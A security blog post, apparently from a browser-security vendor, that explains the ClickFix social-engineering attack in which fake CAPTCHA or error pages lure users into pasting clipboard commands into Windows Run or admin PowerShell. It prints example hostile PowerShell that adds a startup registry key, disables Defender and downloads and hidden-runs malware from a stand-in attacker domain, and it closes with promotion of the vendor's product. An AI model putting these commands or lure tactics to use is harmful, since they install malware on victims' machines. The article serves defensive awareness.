National Cyber Warfare Foundation (NCWF)

ClickFix: Social Engineering That Bypasses EDRs, SWGs and Humans
0 user ratings		2025-03-28 17:43:05
milo
Blue Team (CND)

When security teams first spotted ClickFix in early 2024, few predicted it would last long in the threat landscape. Yet here we are in 2025, watching this simple attack continue its devastating march through organizations worldwide.


Today, attackers don’t even need to create intricate algorithms to try to penetrate your enterprise network. Clickfix is a prominent attack technique in the realm of simple social engineering that bypasses all traditional security solutions. That CAPTCHA verification you’ve completed countless times? That troubleshooting wizard that appears when something isn’t working quite right? ClickFix has transformed these familiar, routine interactions into weapons.


What makes it so effective is that victims aren’t being careless — they’re trying to be responsible. They’re following what appears to be standard procedure, doing what they believe is maintaining security, not compromising it. And therein lies the cruel irony of ClickFix: our best intentions have become our greatest vulnerability.


What is ClickFix?


ClickFix is a social engineering attack that deceives users into executing malicious commands on their own devices. Unlike traditional malware delivery methods that require downloading and running executable files, ClickFix leverages Windows’ built-in utilities to execute malicious code directly through keyboard commands.


The attack typically begins with a convincing interface impersonation that presents users with a seemingly legitimate reason to take action, such as:



  • Fixing a browser error

  • Proving they are human via a verification process

  • Registering their device to access protected content

  • Troubleshooting audio/video connectivity issues


These deceptive interfaces then guide users through specific keyboard sequences (typically Windows+R followed by Ctrl+V and Enter, or launching PowerShell as administrator followed by Ctrl+V and Enter) that execute malicious code that has been silently copied to their clipboard.


Evolution of ClickFix Attacks


The ClickFix attack has evolved rapidly since its first appearance, with each iteration becoming more sophisticated and harder to detect.


Phase 1: CAPTCHA Verification


The earliest documented ClickFix campaigns primarily used fake CAPTCHA verification interfaces. These deceptive prompts claimed users needed to verify they were human by pressing Windows+R, then pasting pre-copied code (using Ctrl+V) and pressing Enter. This approach was effective because CAPTCHA challenges are ubiquitous across the web, and users are conditioned to follow verification steps without question.



Phase 2: Basic Browser Error


In the second phase attackers primarily used simple browser error messages with basic styling. These fake error messages typically claimed that a webpage couldn’t be displayed correctly, then instructed users to open powershell as admin and and then right-clicking to paste copied code in the terminal window



Phase 3: Email Attachment Campaigns


The third phase involved malicious attachments in phishing emails, disguised as documents, invoices, or reports. When opened, these attachments displayed convincing error messages claiming the document required “registration,” directing users to execute PowerShell commands to view the supposed content.




Phase 4: Application-Specific UI Impersonation


The most recent and sophisticated evolution involves precise mimicry of specific application interfaces, such as:



  • Google Meet/Zoom with camera or microphone error messages

  • Document viewing platforms with authentication requirements

  • GitHub security alerts for developers




Technical Anatomy: Two Primary Attack Vectors


ClickFix attacks have evolved into two distinct technical approaches, each with its own execution flow and security implications.


Vector 1: The Windows+R Method


The most common ClickFix implementation leverages the Windows Run dialog:


User Instructions Typically Shown:



  1. Press Windows+R to open the Run dialog

  2. Press CTRL+V to paste content (pre-loaded into clipboard)

  3. Press Enter to execute


What the Copied Code Does:


When the user pastes the content into the Run dialog, they’re actually pasting a command like:


powershell -w hidden -e [Base64-encoded PowerShell command that, when decoded, typically performs malicious actions such as downloading executable files from attacker-controlled servers]

This command performs several actions:


1. Launches Hidden PowerShell: The -w hidden flag starts PowerShell with no visible window, making the execution invisible to the user.


2. Executes Encoded Commands: The -e parameter indicates that what follows is a Base64-encoded PowerShell script, which helps bypass security monitoring systems that look for suspicious command patterns.


3. Downloads Malware: When decoded, the Base64 string reveals commands that typically:



  • Create a web client object to download files from the internet

  • Download malicious executable files from attacker-controlled servers

  • Save these files to hidden system locations (often in C:\ProgramData or %TEMP%)

  • Execute the downloaded malware immediately


All of this happens within seconds of the user pressing Enter, with no visible windows or notifications, giving the impression that nothing has happened while the malware secretly establishes control over the system.


Vector 2: The PowerShell Administrator Method


The more dangerous variant instructs users to manually launch PowerShell with elevated privileges:


User Instructions Typically Shown:



  1. Open “Windows PowerShell with Admin privileges

  2. Paste provided code into PowerShell

  3. Press Enter to execute


What the Administrator Code Does:


When the user pastes the code into an elevated PowerShell window, they’re executing commands with complete system access. A typical malicious payload includes:


# Modify protected registry keys
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "SystemUpdate" -Value "powershell -w hidden -e [encodedPayload]" -Force

# Disable security controls to prevent detection
Set-MpPreference -DisableRealtimeMonitoring $true
# Download additional malware components
$client = New-Object System.Net.WebClient
$client.DownloadFile("http://example-malicious-domain.com/malware.exe", "C:\ProgramData\svchost.exe")
Start-Process "C:\ProgramData\svchost.exe" -WindowStyle Hidden

This administrative-level code performs significantly more dangerous actions:


1. Creates System-Level Persistence: Unlike user-level attacks, admin privileges allow the malware to:



  • Modify protected registry keys in HKLM (HKEY_LOCAL_MACHINE)

  • Create startup entries that affect all users on the system

  • Install services that run with SYSTEM privileges


2. Disables Security Protections: With admin rights, the malware can:



  • Turn off Windows Defender real-time protection

  • Modify firewall settings to allow malicious connections


3. Installs Privileged Malware: The downloaded components:



  • Are placed in protected system locations

  • Can run with elevated privileges

  • Can access sensitive system resources

  • Often include remote access tools that give attackers complete control


This method is particularly devastating because it gives attackers full administrative control over the compromised system, allowing them to access all user accounts and data, extract credentials, pivot to other network machines, disable security controls, and establish persistence that survives reboots and security scans.


Why ClickFix Is Hard to Detect


ClickFix attacks represent a perfect storm of evasion techniques that challenge traditional security systems for multiple reasons:


1. Unmonitored Clipboard Operations



  • Security solutions typically focus on detecting malicious attachments or URLs rather than clipboard operations

  • Most endpoint protection tools have no visibility into clipboard content or monitoring mechanisms to detect malicious code being copied


2. User-Initiated Privilege Escalation


The execution appears user-initiated with administrative privileges, bypassing controls that monitor for unauthorized elevation attempts


3. No Initial Malicious File Download


Unlike traditional malware delivery:



  • No suspicious executable is initially downloaded that could trigger file-scanning security tools

  • The actual malicious payload is downloaded and executed only after the initial code execution


4. Abuse of Trusted Services


Modern ClickFix variants leverage trusted platforms to deliver secondary payloads:



  • Downloads from Microsoft SharePoint, Google Drive, or GitHub bypass URL reputation filters

  • Traffic to cloud storage services is typically allowed through firewalls


The Solution: Browser Detection and Response


The browser is a complex application, akin to an operating system on its own. Attackers are exploiting various aspects of the browser and orchestrating attacks that render entirely on the client side. Existing security solutions like Secure Web Gateways as part of SASE/SSE solutions are unable to protect users against modern web threats that happen on the client side, and endpoint security solutions have no visibility into what happens in the browser during an attack.


Defense against ClickFix attacks:


1. Stopping Attacks at the Source



  • Browser-based solutions can detect and block malicious clipboard operations at their origin, preventing the attack chain from beginning

  • Browser security can detect when JavaScript attempts to programmatically manipulate clipboard content with suspicious commands


2. Contextual Awareness and UI Analysis



  • Browser security solutions can detect fake interfaces mimicking legitimate services (like Google Meet or Zoom)

  • Advanced solutions can identify when a Google Meet UI is improperly hosted on an unusual domain like Google Sites

  • Visual analysis can detect UI inconsistencies that might fool humans but can be algorithmically identified


SquareX’s Browser Detection and Response (BDR) provides powerful protection against increasingly sophisticated ClickFix attacks. Deployed as a lightweight browser extension, SquareX creates security directly where attacks occur — in the browser itself. Squarex can block copy of malicious PowerShell commands that trick users into compromising their systems. SquareX also detects and prevents interface mimicry attempts that impersonate trusted applications like Zoom and Google Meet.


By operating directly within the browser — where traditional security tools remain blind, SquareX creates an essential shield against such attacks, stopping them at their source before anyone in your organization unwittingly becomes the weak link in your security chain.


#webattacks #powershell #cybersecurity | Dakshitaa B.


https://medium.com/media/40962c1612f40b6231542b47912f1aff/hrefhttps://medium.com/media/4864fc21fce20cbe48cf206b9da4c3d7/hrefhttps://medium.com/media/ed61a90b043ce618fbf3badec204153f/href





ClickFix: Social Engineering That Bypasses EDRs, SWGs and Humans was originally published in SquareX Labs on Medium, where people are continuing the conversation by highlighting and responding to this story.


The post ClickFix: Social Engineering That Bypasses EDRs, SWGs and Humans appeared first on Security Boulevard.



Engineering @ SquareX

Source: Security Boulevard
Source Link: https://securityboulevard.com/2025/03/clickfix-social-engineering-that-bypasses-edrs-swgs-and-humans/?utm_source=rss&utm_medium=rss&utm_campaign=clickfix-social-engineering-that-bypasses-edrs-swgs-and-humans

Comments
new comment
Nobody has commented yet. Will you be the first?
  
Forum
Blue Team (CND)


Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.